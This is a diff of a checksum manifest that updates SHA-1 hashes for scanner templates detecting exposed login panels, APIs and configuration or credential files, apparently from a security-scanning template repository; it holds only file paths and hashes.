-http/exposed-panels/tooljet-panel.yaml:6508dcddc21a109b5d6fac690320b76509e1e3f0 -http/exposed-panels/total-web-solutions-panel.yaml:cb777be4acfadd2e81219934dd90afec078ee897 -http/exposed-panels/totemomail-panel.yaml:0e81892a7b0ff9579624dcd3ad1d1a0391bcb233 -http/exposed-panels/tracer-sc-login.yaml:db6ce51c6be9950dcd58e8f4971d8052b1980a04 -http/exposed-panels/traefik-dashboard.yaml:479ce83869bc265263df2842822ff4e300ff0275 -http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:22922e12703c9e8bd7a6615878339d90052d2424 -http/exposed-panels/truenas-scale-panel.yaml:4bb3b855e11430fac50a2599f6a014628129910e -http/exposed-panels/tufin-securetrack-login.yaml:f6d2800d2273eae1e6ab906d35bd33ec738b931f -http/exposed-panels/tup-openframe.yaml:de029d2a04450c6307c03647ac543e7ead5a4430 -http/exposed-panels/turnkey-openvpn.yaml:a23c719ef31a302abeef7c1192e56b0bbd4f9c48 +http/exposed-panels/thruk-login.yaml:f826296dc7ea473c393e0d198da48049fe04068c +http/exposed-panels/tibco-spotfire-panel.yaml:4ffd6609cef696289b9a6bc5c41490c9f3aa5b99 +http/exposed-panels/tigase-xmpp-server.yaml:7615b970cad4909c89cefabe07c0d49696b63799 +http/exposed-panels/tikiwiki-cms.yaml:d91b81e5563c5ba7d2250b12f8f212123f011e90 +http/exposed-panels/tiny-file-manager.yaml:a2b82b2bbaced8296bdf096ca1d4572118f78eb5 +http/exposed-panels/tiny-rss-panel.yaml:8f1a227e6817acfd26dfc58649ba4ba519afc061 +http/exposed-panels/tixeo-panel.yaml:3d3add11d1b9ff423817bf2edaf47a692049b3e1 +http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:142cae6b2c3657adfc91f00225383494722e768f +http/exposed-panels/tooljet-panel.yaml:25787d33b29529884c9002fafede329a5f53111e +http/exposed-panels/total-web-solutions-panel.yaml:c792bfbfed0cfe6971fecf0aa42d4fb417b3d49a +http/exposed-panels/totemomail-panel.yaml:a1f46a2540203c5c3093a82282bb98164bb1bf8b +http/exposed-panels/tracer-sc-login.yaml:57902ac871a95304f034d0aa4a2cb96f04cad2a6 +http/exposed-panels/traefik-dashboard.yaml:19db275a7effc62cc9fee16ae6e6b4ac81b98635 +http/exposed-panels/trendnet/trendnet-tew827dru-login.yaml:d2198b812f4062c0f360ef2cc7e590547d75bc83 +http/exposed-panels/truenas-scale-panel.yaml:56f855f113eb0d8fe648485a1ba0ea24988ae7da +http/exposed-panels/tufin-securetrack-login.yaml:63c396fb780b3aa5de4176aea0e183338ef43943 +http/exposed-panels/tup-openframe.yaml:8e6f0bcd762cdf9098621e8323e811b702424060 +http/exposed-panels/turnkey-openvpn.yaml:499a14d9a3eb9ca68ffcf856cd357b8a552bf30b http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767 -http/exposed-panels/typo3-login.yaml:a4cb69a1e6188c1bb61d9a31e827495a589f9596 -http/exposed-panels/uipath-orchestrator-panel.yaml:0966ab57eeee1eac0545a21d38aa619f28e9df40 +http/exposed-panels/typo3-login.yaml:4e116dbb08d4fa3bc3aed57ad47e38728f911996 +http/exposed-panels/uipath-orchestrator-panel.yaml:fec825dfb388543dd67a534e38164b407c303237 http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d -http/exposed-panels/umbraco-login.yaml:b0ac59c93624826758bcc4efb31d912092e76734 -http/exposed-panels/unauth/tautulli-unauth.yaml:b6c3bd37c924ba31139cbbc25bd8a79a1f16abb1 -http/exposed-panels/unauth-xproxy-dashboard.yaml:f33b71c3f9acc1bc7d5fd315d0682563c72c834b +http/exposed-panels/umbraco-login.yaml:46d422c5b866130df2f2ed65e335449ba45709a1 +http/exposed-panels/unauth/tautulli-unauth.yaml:79981902f98a27092e36722232b68205c29e17f6 +http/exposed-panels/unauth-xproxy-dashboard.yaml:79325f88fd9da1f20167188c0b33877a3d6888a3 http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 -http/exposed-panels/unibox-panel.yaml:bf3f47e1158708eac3b0113f1e54ae8dfd93cd6a +http/exposed-panels/unibox-panel.yaml:bb70d1e1bb1bbe87ba4148e5c0ff33eb6919b796 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e -http/exposed-panels/unleash-panel.yaml:13fbcb2a703922820207055621b375f4991a93b8 -http/exposed-panels/untangle-admin-login.yaml:fd27aed503201fde81d80f7e3119800c567838c5 -http/exposed-panels/uptime-kuma-panel.yaml:f2c7824cfa0f07c0770433b67fc120a9ca9539eb +http/exposed-panels/unleash-panel.yaml:131943739ba48ec1125f89c1e2fc4bc61f1c89d7 +http/exposed-panels/untangle-admin-login.yaml:df482c1a46cc23c86002e826efb080f37b85108b +http/exposed-panels/uptime-kuma-panel.yaml:ed91941e5e6791fa777f5def16a247f80498ec44 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d -http/exposed-panels/v2924-admin-panel.yaml:52e5b61d18c0cf5c2d2a24de8a58d4802724b98e -http/exposed-panels/vault-panel.yaml:8970086c03e3e2063bb1c14d806e803b40545203 +http/exposed-panels/v2924-admin-panel.yaml:20b0e24a3e6804139f1be474610304e31c942d3f +http/exposed-panels/vault-panel.yaml:8d56472c645b79321e266d886cfc88badbcbc82b http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b -http/exposed-panels/veeam-backup-gcp.yaml:19fc4b6e2accbabe5fb6722619f903edf3365613 +http/exposed-panels/veeam-backup-gcp.yaml:9d051a42faa50df7973f9303bd97f15daada10fa http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 -http/exposed-panels/veriz0wn-osint.yaml:7478c11b7db96276f2c22eeb1815dc9b8420a80c -http/exposed-panels/verizon-router-panel.yaml:0cade7ae1734b8550e3d5bcec09466c0d3748b25 -http/exposed-panels/versa/versa-director-login.yaml:8f24c1b9480fe4573d2aa143e31f714ce2ee27f8 -http/exposed-panels/versa/versa-flexvnf-panel.yaml:4e87d106123ec21ad90159a6a2f3dadace07ea70 +http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c +http/exposed-panels/verizon-router-panel.yaml:cbdcbd2023415c5f2dc6fbb45cf9e9c226a9011b +http/exposed-panels/versa/versa-director-login.yaml:66f975eb1be7fd76bddea77c64db0a157d06243e +http/exposed-panels/versa/versa-flexvnf-panel.yaml:8b5b208d52773d552645587b8e1bf151fb51659d http/exposed-panels/versa/versa-sdwan.yaml:764d9847bc2936ffe0c2543e76ee106f623a9a91 -http/exposed-panels/vertex-tax-panel.yaml:4fda3479ea3eaf8db1a919b28ef9fb2575c21b73 +http/exposed-panels/vertex-tax-panel.yaml:fbd86e61e93c208d2c312c51e8ca4bd89853e93c http/exposed-panels/vidyo-login.yaml:e8732736c6ac1036bfb83b0b74caaf3152efe5b7 http/exposed-panels/vigor-login.yaml:dad14fa3849ff6ea9a58ffb3709424294d6aceab -http/exposed-panels/vinchin-panel.yaml:75e48a1fbbe09471c65defb66d4862fb10a40218 -http/exposed-panels/virtua-software-panel.yaml:3d1a2020578e7f9f4391bfbf12c29aab05532f4e +http/exposed-panels/vinchin-panel.yaml:7a197c6881dd54465f1918acbeeae3fdba3484e4 +http/exposed-panels/virtua-software-panel.yaml:bc0229998feb2dad214b820e76c0e21fa597f3a9 http/exposed-panels/virtual-ema-detect.yaml:02b9fdcff2c9183effa7675ef1e9b18df5c9e918 -http/exposed-panels/vistaweb-panel.yaml:32a825daf211579302d0bda7342bc3b83dc0e5c8 -http/exposed-panels/vmware-carbon-black-edr.yaml:6252a95f440180440b1129f3dc211407653c6770 -http/exposed-panels/vmware-cloud-availability.yaml:3d614a855aa4f888bf2c219aec20a6ba21ac674a -http/exposed-panels/vmware-cloud-director.yaml:1b4cb53b18ecc9e49aeadfc42b41e1f0b07e7edd -http/exposed-panels/vmware-ftp-server.yaml:3a6d54994a4db73ac7ba303d30b3df89d44bf1f7 -http/exposed-panels/vmware-hcx-login.yaml:771cdb5f830689ce8ba0414067358890070541b4 -http/exposed-panels/vmware-horizon-daas.yaml:4b757ac93dfc1f34aed2bd97877e40f3fc1900b5 -http/exposed-panels/vmware-horizon-panel.yaml:bba3c2b0ee67793696ad14f429223cdf820fc274 -http/exposed-panels/vmware-nsx-login.yaml:1dea9b68f812fe1b4442832f59f6eda5f338fb48 -http/exposed-panels/vmware-vcenter-converter-standalone.yaml:253fa946300334e910cbe9860ee5398312b376c1 -http/exposed-panels/vmware-vcloud-director.yaml:ff4803a50e53b6cb062534b24d1d986fb85d1db2 -http/exposed-panels/vodafone-voxui-panel.yaml:f3c8faadc44db8a7ce8792fc71523caad85e1833 -http/exposed-panels/voipmonitor-panel.yaml:65323e4848c9115437d1a622fe4a7e8b174116e1 +http/exposed-panels/vistaweb-panel.yaml:2da7f46b0a5a4865a3fb2c9019c3006ad478e70b +http/exposed-panels/vmware-carbon-black-edr.yaml:c245a504fbf899a1727ed03088d0576cf72325db +http/exposed-panels/vmware-cloud-availability.yaml:5956b759d6419cb7cd1b70b20bdeff540c4eea4a +http/exposed-panels/vmware-cloud-director.yaml:57d1162f8d7d561f47e734ff576bbc0b69d6f76f +http/exposed-panels/vmware-ftp-server.yaml:7b943d31c3cadabbee96713cee3406dcef85d6e9 +http/exposed-panels/vmware-hcx-login.yaml:b7643109ab4e780d018819f1a7ab06c9f30ed35b +http/exposed-panels/vmware-horizon-daas.yaml:03210863598bdafc2c98fe4114e4d8aaa7c4c936 +http/exposed-panels/vmware-horizon-panel.yaml:e2b861a8046d6e5dcbc9170b308ad255db8b1975 +http/exposed-panels/vmware-nsx-login.yaml:403e62c30d177dbf09f0c52846c07a6adebfe99e +http/exposed-panels/vmware-vcenter-converter-standalone.yaml:e7dd5e08e0e396b9cddb65bfc4449956170b6c88 +http/exposed-panels/vmware-vcloud-director.yaml:d78681314523cce69be2b9aede38c5180fd3d5e8 +http/exposed-panels/vodafone-voxui-panel.yaml:fff2909426f26df067d90999f401fea1630f1b5d +http/exposed-panels/voipmonitor-panel.yaml:fe2f7d0c31b75b20e077eec64aefa8e266cfc00d http/exposed-panels/vrealize-hyperic-login-panel.yaml:da4dd0d80ada82ae2cad2905b60b7171c6887bd7 -http/exposed-panels/vrealize-loginsight-panel.yaml:2354fdb4f7cfdf4a482d10193b4e6f10204c702a -http/exposed-panels/vue-pacs-panel.yaml:5e696f80cc1be77e0b772e8b17b8bb81d8cc9359 +http/exposed-panels/vrealize-loginsight-panel.yaml:33871153ec32fc12f43fffe6ff2e74eb7117dc47 +http/exposed-panels/vue-pacs-panel.yaml:1832a2caab7f667d9e6e97d993707c249c2299e2 http/exposed-panels/wago-plc-panel.yaml:408e8ec5941005afb61d1f1b11501fefcf33b946 -http/exposed-panels/wagtail-cms-detect.yaml:4f13c91ee6455860edc877e4ef4b96c6e3897fb5 +http/exposed-panels/wagtail-cms-detect.yaml:0b9e0ab5dc18bdb3e92ecef95c5f54abc9f13ce6 http/exposed-panels/wallix-accessmanager-panel.yaml:feaf5dd823b02e322eb08d74c46064eefa7b7955 -http/exposed-panels/wampserver-homepage.yaml:5b8f3bac7210fac5f3a738aed5e410ef2038367c -http/exposed-panels/watcher-panel.yaml:38eeb836b7b1dc9c08700feac6c08a7fe6ee9396 -http/exposed-panels/watchguard-panel.yaml:6dbd0dbb575a3bcfe597b20ff14359bab24d6495 -http/exposed-panels/watershed-panel.yaml:da612b3b84c46639baa6ab228924605d8059b7cf -http/exposed-panels/wazuh-panel.yaml:0f46d0b4bef2f8632cb5c6d1c2687e3e0f4a5be2 -http/exposed-panels/wd-mycloud-panel.yaml:aabfca9eccd393c6b1a0db77bfc3a4549a74ffd3 +http/exposed-panels/wampserver-homepage.yaml:ca661ec3f6e2a6283cc40afb5dce2c7ba5492f23 +http/exposed-panels/watcher-panel.yaml:11ae07a446f20abfb086405565c6bfba5732dd82 +http/exposed-panels/watchguard-panel.yaml:0370dcba8f19d1f2b5cdc689131fbb0f2d82b74f +http/exposed-panels/watershed-panel.yaml:cc6a6a8c6b635ca055d3dcc7885e2b33af455c72 +http/exposed-panels/wazuh-panel.yaml:c2bb36ffb096eff62501c1ec9d9485d19177c5f0 +http/exposed-panels/wd-mycloud-panel.yaml:2a0444b323bf45667e0cc67e7b310e31fb322375 http/exposed-panels/weatherlink.yaml:61171960d11dfd6b634883e8a828825611cc1b22 http/exposed-panels/weave-scope-dashboard.yaml:15f951252a81a9039b480e27888e7668fb75004f -http/exposed-panels/web-file-manager.yaml:8c451ffeb7e02c1561d686b2569e053882513e5d +http/exposed-panels/web-file-manager.yaml:7a834664269462a1ed6168e2daf4d9afc72947cc http/exposed-panels/web-local-craft.yaml:17ecbaba7191f05758350a239403ecc5ddc9386f -http/exposed-panels/web-viewer-panel.yaml:49cdd815b7ed9dc27ad47081f40868140fdac86b -http/exposed-panels/webcomco-panel.yaml:6d1f3463bfad14644c871f22c0ac9dad56248252 -http/exposed-panels/webeditors-check-detect.yaml:115d430f908ff9df224e424bda4976b7d96ef52d -http/exposed-panels/weblogic-login.yaml:8adea78734b7fe52c5ebebf64c393bfcd3bd05f0 -http/exposed-panels/weblogic-uddiexplorer.yaml:6eaf5c854beb8e57ec4f197626df88ca04412ad0 -http/exposed-panels/webmin-panel.yaml:b788be5764c9deb4f707b16423d9edbe10e6f353 -http/exposed-panels/webmodule-ee-panel.yaml:afc3974c6dbf79c254e9546c065fd3b11c364b84 +http/exposed-panels/web-viewer-panel.yaml:678312268c99f3455f20f2d7590ecf9b3392bbf4 +http/exposed-panels/webcomco-panel.yaml:b616138e5d1fecacc01a138680e87f31589feae8 +http/exposed-panels/webeditors-check-detect.yaml:6161982657b41ea12028d8562768c39a30fd7473 +http/exposed-panels/weblogic-login.yaml:551019d6e2ca88c626669435804e5c0aade2fb9c +http/exposed-panels/weblogic-uddiexplorer.yaml:939b96364a5bc4daf059fd442e00298965065466 +http/exposed-panels/webmin-panel.yaml:3cff080c8833c869f1f78b652fa2dfc188383f3b +http/exposed-panels/webmodule-ee-panel.yaml:f4d019a1d6d65fd9adca8b9fdaa883b68fe10957 http/exposed-panels/webpagetest-panel.yaml:3b7d0c81f7645e41c7f85e6056ed6a9582b1fcc5 -http/exposed-panels/webroot-login.yaml:cab4fe81c326f51ffde081858b727d80df58b142 -http/exposed-panels/webshell4-login-panel.yaml:5d6d9c3a21bf3a7719b41ecab4fccc98d16bdc1c -http/exposed-panels/webtitan-cloud-panel.yaml:08964307b6633875114d2c59fffe1cd9ef776143 -http/exposed-panels/webtransfer-client-panel.yaml:3bdc03f237b3c7d67f5b5c5cc1fa868e899001e4 -http/exposed-panels/webuzo-admin-panel.yaml:2a23dfafdc35ba3c503b77e7148b839f1cba9040 -http/exposed-panels/weiphp-panel.yaml:228a360dff16728045d0f9bbaae24a6ab4b07538 -http/exposed-panels/whm-login-detect.yaml:aba72c245c8e8393019b308856432b3a783861fb -http/exposed-panels/wiren-board-webui.yaml:e95f3caf610b91a741ebdee0a3a311766c73a3c7 -http/exposed-panels/wmw-enterprise-panel.yaml:929b8eaf8398d8088610c0d2879945795d0309fb +http/exposed-panels/webroot-login.yaml:e00a26cf295eb83af87aea226e71fc748484ca1e +http/exposed-panels/webshell4-login-panel.yaml:ba1562493084da9b6feccfc8894e9960f8db7f21 +http/exposed-panels/webtitan-cloud-panel.yaml:86f07bb96c93fe6b3c608a1e84b7bb69714a3abc +http/exposed-panels/webtransfer-client-panel.yaml:b1054dd275106994578f41a42c2f5efa8c0cd019 +http/exposed-panels/webuzo-admin-panel.yaml:79771243fa08571a0cef9c0102bc4891b3d61f77 +http/exposed-panels/weiphp-panel.yaml:3e5f27cdb4868c216dfa5f7a321e68777cc710a9 +http/exposed-panels/whm-login-detect.yaml:2023f5c1f8aa4ddfc9aff536684167141ae4fa4e +http/exposed-panels/wiren-board-webui.yaml:3d3ad4063b875c1ad154d84ff5bfce3b490cbd40 +http/exposed-panels/wmw-enterprise-panel.yaml:4e63e7afc9132ea9ed6204b751bb56c5df4a9f0c http/exposed-panels/woodwing-panel.yaml:d942acdcb220526e73ff3c3ec78289807bd0e1f1 -http/exposed-panels/wordpress-login.yaml:34621b83595d281033e1df6bb4141af3cfc18fb1 +http/exposed-panels/wordpress-login.yaml:70e451144d20889a182b82f430b07f65036ddd12 http/exposed-panels/workresources-rdp.yaml:6a54b472af88df3e926f984a8bd3fa48e2380a05 -http/exposed-panels/workspace-one-uem.yaml:300e56b151ffd4998ae6da5142344f431c10fa72 -http/exposed-panels/wowza-streaming-engine.yaml:846144d3968f28d252cee8e58e59a52d2e644b07 -http/exposed-panels/ws_ftp-server-web-transfer.yaml:7e82e08315b30516d65e3a055ac4d8e35d19900d -http/exposed-panels/wso2-management-console.yaml:9212e9e12241f73ce3e6006203ad3ccbf3362f6b +http/exposed-panels/workspace-one-uem.yaml:10f8fe68f55c1e92af87e69a468a894bccaf5dca +http/exposed-panels/wowza-streaming-engine.yaml:1b296a0f6fc254e6f8dd0531cb0636d9f871d83b +http/exposed-panels/ws_ftp-server-web-transfer.yaml:f24c30062da3c360341378b44cac83fc50c473ec +http/exposed-panels/wso2-management-console.yaml:b7f2346a85f7fdc5f0d982a089050bbccee8e0b7 http/exposed-panels/xds-amr-status.yaml:dd152a8f62710723e761801c35fe84b4f0e268dd -http/exposed-panels/xeams-admin-console.yaml:a9092591e719d01eca4cc1d284214cecca37b65e -http/exposed-panels/xenmobile-login.yaml:f3927461e73106ba158a9570a74b76aedcd13906 -http/exposed-panels/xfinity-panel.yaml:c7efc14e77973e342d366e1e7e467620ed8f7110 +http/exposed-panels/xeams-admin-console.yaml:d8391161a5fc93ca9604a5d9efa4ad961fd31af1 +http/exposed-panels/xenmobile-login.yaml:a31d6049dca85297da74ddc0a648e4f9ad0bc9f6 +http/exposed-panels/xfinity-panel.yaml:3e8b1d4c4f693913b419fac6111eb18fdf3c678e http/exposed-panels/xiaomi-wireless-router-login.yaml:a82f257d004f1ab2c1896cd979378695bd6746fa -http/exposed-panels/xibocms-login.yaml:db2a0fd07b24ff96312c80b4f1ce51faeb9da0bc -http/exposed-panels/xnat-login.yaml:af4faa0ea7fc3b8cecd7d0c82de285eaaf0d43b7 -http/exposed-panels/xoops/xoops-installation-wizard.yaml:1aebb50ab2d8b80589c49f14fdaf47197e70c7e6 -http/exposed-panels/xvr-login.yaml:43015eb25b2549bc605e86cfab04e3c722505a4b -http/exposed-panels/xweb500-panel.yaml:ec7a5037b2a4e6550e492529cda3b6a4b70e9e7f -http/exposed-panels/xxljob-panel.yaml:fda73bdbd2b614e2a4027ed7ff94a724019a00b5 -http/exposed-panels/yarn-manager-exposure.yaml:86acccc923cf9783f92e1ab56d392d12657952b7 -http/exposed-panels/yellowfin-panel.yaml:9add013ac73a6c57ec7b7085d6613719e4d9913e +http/exposed-panels/xibocms-login.yaml:56ae3915604fb4a2f1f26764cb05efc18d89965d +http/exposed-panels/xnat-login.yaml:d08ec2f986c1bd956d1b4ed147e79ce33439a91f +http/exposed-panels/xoops/xoops-installation-wizard.yaml:15c3b77e4baf5e3276ab69bb75d6bc938579376e +http/exposed-panels/xvr-login.yaml:1472b33439ca1a693c7707ac08287d943341be82 +http/exposed-panels/xweb500-panel.yaml:95b0d20e067bd18247384bb8fdc3689406885fb2 +http/exposed-panels/xxljob-panel.yaml:8ce20129e7df8a20a76dd6371981a6afdd6e5080 +http/exposed-panels/yarn-manager-exposure.yaml:73a4fe07f2c9ee15bbbb2c40f771468e0459872f +http/exposed-panels/yellowfin-panel.yaml:a1855985924c0986fa45427a492478c800d85010 http/exposed-panels/yopass-panel.yaml:ecba56804c1bf76c0fb298ab7b79ed5ec66658b5 -http/exposed-panels/yzmcms-panel.yaml:399d4abbd03103c7b02b68a1651df7807ec91c2f -http/exposed-panels/zabbix-server-login.yaml:eee7d23d3992dd0f44a3335ed8bfa8474ba37067 -http/exposed-panels/zblog-exposed-admin-panel.yaml:c6d0b39eb2ef24b003f464cdeab4705efc871eee +http/exposed-panels/yzmcms-panel.yaml:79b325c671fb8a17f344c9609f4f630eccd0bd8b +http/exposed-panels/zabbix-server-login.yaml:06bc3f9a9ff8007e71a5c6f40d7c3cf95147efbe +http/exposed-panels/zblog-exposed-admin-panel.yaml:d17c4f4313389b0fa5fc6bfd68df41cbec35ac3a http/exposed-panels/zblogphp-panel.yaml:e685ebcc5d060fb75e7cc4b54c03134e6891c65d -http/exposed-panels/zenario-login-panel.yaml:f48d2f158a328813b6e5e730417a000e8d263ad0 +http/exposed-panels/zenario-login-panel.yaml:7d785d3ba5d74a072d170e360a0bc13f00e0af26 http/exposed-panels/zenml-dashboard-panel.yaml:25f442ce4d82a5b696f1e713da67057e5cb405ce -http/exposed-panels/zentao-detect.yaml:98c2f83ba9b52166866bd645fabd3fef9821bdce +http/exposed-panels/zentao-detect.yaml:9e0898107e90309bac4b076ae58c4861a59829d5 http/exposed-panels/zentral-panel.yaml:c38400c4f410e2974291f154ba202f94477c418f -http/exposed-panels/zeroshell-login.yaml:765ae0e3d905098a0809e0764e622b8c0b296eb8 -http/exposed-panels/zimbra-web-client.yaml:c3c8da32c9607299264fbbbce807114d3a1e54a6 -http/exposed-panels/zimbra-web-login.yaml:7e9d09872df578adba7ec1c2e9f90a7dd241cd5f -http/exposed-panels/zipkin-exposure.yaml:b788f683444a99e71244185811081dde7ed1b546 -http/exposed-panels/zoho/manageengine-adaudit.yaml:7da5416a01c32367eed31e3e386e68bae4dfea67 -http/exposed-panels/zoho/manageengine-adselfservice.yaml:861dbcb7ca03a52bec6fafb91d37c8d6084b0a12 -http/exposed-panels/zoho/manageengine-analytics.yaml:871451a033c2a7a852ccb84e7eda32c6576f8c99 -http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml:799a6b2f0e41db492249c43dd2becb6007795ed2 -http/exposed-panels/zoho/manageengine-applications-manager.yaml:1ae0476555df425feb1b6b4d61134b9373b691ed -http/exposed-panels/zoho/manageengine-assetexplorer.yaml:fda5b89d96373f8b599e67bd5228df762cc57ea0 -http/exposed-panels/zoho/manageengine-desktop.yaml:03ce08abfa94b3abc914574be699fe6da234ac6a +http/exposed-panels/zeroshell-login.yaml:3bb0ae0f202126c6eaf84bda20fd57105709acc6 +http/exposed-panels/zimbra-web-client.yaml:406e301eb8605829fa8c79f1e975b7653e43092d +http/exposed-panels/zimbra-web-login.yaml:cab29c46f2bad0b39bf474b73159163a685b7bf2 +http/exposed-panels/zipkin-exposure.yaml:42d8d2c4157271f1ed0c3f862d1335d4710cb8df +http/exposed-panels/zoho/manageengine-adaudit.yaml:bb900bf725a186c64c00a5332f1a89a2a2c07b18 +http/exposed-panels/zoho/manageengine-adselfservice.yaml:9f53bc8e74f4b7b6382e280b74fec6e280d13767 +http/exposed-panels/zoho/manageengine-analytics.yaml:f54a2f6336b5f902c262cf1bbb75365ffd32cbc2 +http/exposed-panels/zoho/manageengine-apex-helpdesk.yaml:995546fec42061288fdcdeb2d90773c67960f9e0 +http/exposed-panels/zoho/manageengine-applications-manager.yaml:9b31d5054183992618bd498493c2a5c5afce4383 +http/exposed-panels/zoho/manageengine-assetexplorer.yaml:9521b249c756fc0ff5591379f8cc67839747d2a3 +http/exposed-panels/zoho/manageengine-desktop.yaml:840dc0ee242fbe8796b7056db63703720f008c9c http/exposed-panels/zoho/manageengine-keymanagerplus.yaml:0233bf933f016d5339e6ae34f915e777abf33a8a -http/exposed-panels/zoho/manageengine-network-config.yaml:9760567e1f73a50e48db276d5cb269ceffc67c84 -http/exposed-panels/zoho/manageengine-opmanager.yaml:059d09a5fc157a5ebf282a42abb04f826b483992 -http/exposed-panels/zoho/manageengine-servicedesk.yaml:22342294013945b2cc9b4a5ef624878d8a74cbee -http/exposed-panels/zoho/manageengine-supportcenter.yaml:859eb144ee9d9cd19d8ea3266c22c0618a8ec7da -http/exposed-panels/zoneminder-login.yaml:09e57667e721cbe7fa66b64e6760b0b62dfa3d7e -http/exposed-panels/zte-panel.yaml:c66ae97828dc9799eae59f1d96438d21ba7718c8 +http/exposed-panels/zoho/manageengine-network-config.yaml:766abf17d343fe0a62fa300dbf01d88ba99529d3 +http/exposed-panels/zoho/manageengine-opmanager.yaml:436a7a19426f3296ce07d5fd14154f6ef39d7e15 +http/exposed-panels/zoho/manageengine-servicedesk.yaml:7f9e043f0ac2737914f8827fb2a207f86fc24289 +http/exposed-panels/zoho/manageengine-supportcenter.yaml:e7773da5982bb6a79a3b5f16092129b5176b4747 +http/exposed-panels/zoneminder-login.yaml:2aae81aeba385ccfd0df62cb4ac941151cea957a +http/exposed-panels/zte-panel.yaml:b1317b38289dab0f3c25be0be0ca8efc7ad2c83e http/exposed-panels/zuul-panel.yaml:ce089d9bc02488dd76c20c76b3fe06abf49ff910 -http/exposed-panels/zyxel/zyxel-firewall-panel.yaml:141b27ae36185e692e709531571f33aca07d4cd5 -http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:044dd74c5776097b9e057a7556ad557839455490 -http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:8babfdb54ca57bcc85bc2eebfecde08889f0b4b2 -http/exposed-panels/zyxel-router-panel.yaml:b954136128d41085443c311792388ecff97d779c +http/exposed-panels/zyxel/zyxel-firewall-panel.yaml:07f29f4690d213b9d1e784f108de1f1011d27605 +http/exposed-panels/zyxel/zyxel-vmg1312b10d-login.yaml:4716ad499fc5988044a8b5ebc53586c764912b16 +http/exposed-panels/zyxel/zyxel-vsg1432b101-login.yaml:f8c8d28e436d9fee96f02b04541bdfacf47f4e30 +http/exposed-panels/zyxel-router-panel.yaml:83c8c6ec045d540bbf41343b59ff690c470d7f8b http/exposures/apis/aspnet-soap-webservices-asmx.yaml:8183da55dabf139446cbd4ab97aaa32a5747d998 http/exposures/apis/couchbase-buckets-api.yaml:c070ad78e1f11370fd510168c96139509ad392d9 -http/exposures/apis/drupal-jsonapi-user-listing.yaml:fde7cab80d673763e543fceb7b68375f3f71b78e +http/exposures/apis/drupal-jsonapi-user-listing.yaml:a194bc59cef79d63fbb3b11892f33e73e42e256b http/exposures/apis/jeecg-boot-swagger.yaml:f90ea6927d4e5f8dad82d5766129ea8de5ba355a http/exposures/apis/openapi.yaml:61119f5825fa000b6b5965624596a1586399bfa8 http/exposures/apis/redfish-api.yaml:f58214d68ea51e861520589b7b2050ddc9e7426c @@ -4673,7 +4673,7 @@ http/exposures/configs/coremail-config-disclosure.yaml:10c7e12794224ac7f9c81cf3b http/exposures/configs/cypress-web-config.yaml:dd978d1d56bd33cbcf827ae65c59265acd6625cf http/exposures/configs/dbeaver-credentials.yaml:cbd4ab7a04824a87c57dd64ef1c700e5c7ac6e42 http/exposures/configs/debug-vars.yaml:0b108f2c2468d3700a7a837b79eec21e3d060785 -http/exposures/configs/deployment-ini.yaml:b72145a9131e98e3b2f68a4971f2a88078abf666 +http/exposures/configs/deployment-ini.yaml:38b534add0fc1e41f9378f85748b118d1a0c8178 http/exposures/configs/detect-drone-config.yaml:8dcfc65408172b76a554d1f5970d2c3cb1edb514 http/exposures/configs/django-variables-exposed.yaml:f459d04766a2b8b6cb97e522e0623abc7c3a8b17 http/exposures/configs/docker-compose-config.yaml:c09c54ae8ef8b7eb9d1afea7fe19ef6b2b0169d3 @@ -4829,7 +4829,7 @@ http/exposures/files/filezilla.yaml:a04a2de7145d42c6cc63a59edf5c13c9660218b5 http/exposures/files/ftpconfig.yaml:37d46a4726edffd9d686224d0a3be7df6ec2780d http/exposures/files/gcloud-access-token.yaml:62d8288a11a5350a01d3e0041ac28c92b7889910 http/exposures/files/gcloud-credentials.yaml:2343f7b00527e9831a765ea61960df72176b1bf1 -http/exposures/files/generic-db.yaml:d79be7b9bd03b6194734555897ee65c09024b241 +http/exposures/files/generic-db.yaml:4266cdbc5a945de5d3c5f82ec2ad2acf9edbe684 http/exposures/files/get-access-token-json.yaml:81c5d4a38a413cda6fbf584f3a955d89dc48a28d http/exposures/files/git-mailmap.yaml:456e18f1c474d4628acc7356b1f816f1fee19fcf http/exposures/files/github-gemfile-files.yaml:451504bab87de4abd36fd46ad03629bdc24ffe5e @@ -4839,7 +4839,7 @@ http/exposures/files/go-mod-disclosure.yaml:868457891a67709f5681525aa9e1fa81d7ff http/exposures/files/google-api-private-key.yaml:75fa461247606ff2715554666c6282ad3e91daca http/exposures/files/google-services-json.yaml:e3f8a9408fb76a37a7f38d331b6a012c31fd5db8 http/exposures/files/gradle-libs.yaml:ba505cac5c050de7f514aaadde18d09b1a85a154 -http/exposures/files/ht-deployment.yaml:0da12da8face542bc52e07676f69f71eb5e2b628 +http/exposures/files/ht-deployment.yaml:dd835c10f071b6d3ad1b6df02ddb9d54af44dfb5 http/exposures/files/iceflow-vpn-disclosure.yaml:df66610da725f7f337878ff9399791feb7f4599d http/exposures/files/idea-folder-exposure.yaml:68c0fb53827d015f0f18f127a96bd530d6c2f7a0 http/exposures/files/ioncube-loader-wizard.yaml:f2e446ca4db043d623f719abdb4c498b2ad2267f @@ -4900,7 +4900,7 @@ http/exposures/files/vscode-sftp.yaml:9eac173ccb9924a07164357a8076c588ee4e3211 http/exposures/files/webpack-mix-js.yaml:8788ba6c4f33a8c072c5072d900b6f5d6e38dd09 http/exposures/files/webpack-sourcemap-disclosure.yaml:d18b822392b235f4cadcb08bc513981af5fac317 http/exposures/files/wget-hsts-list-exposure.yaml:43f1de69f66711aa31cc21be45c6c2bd108dd60b 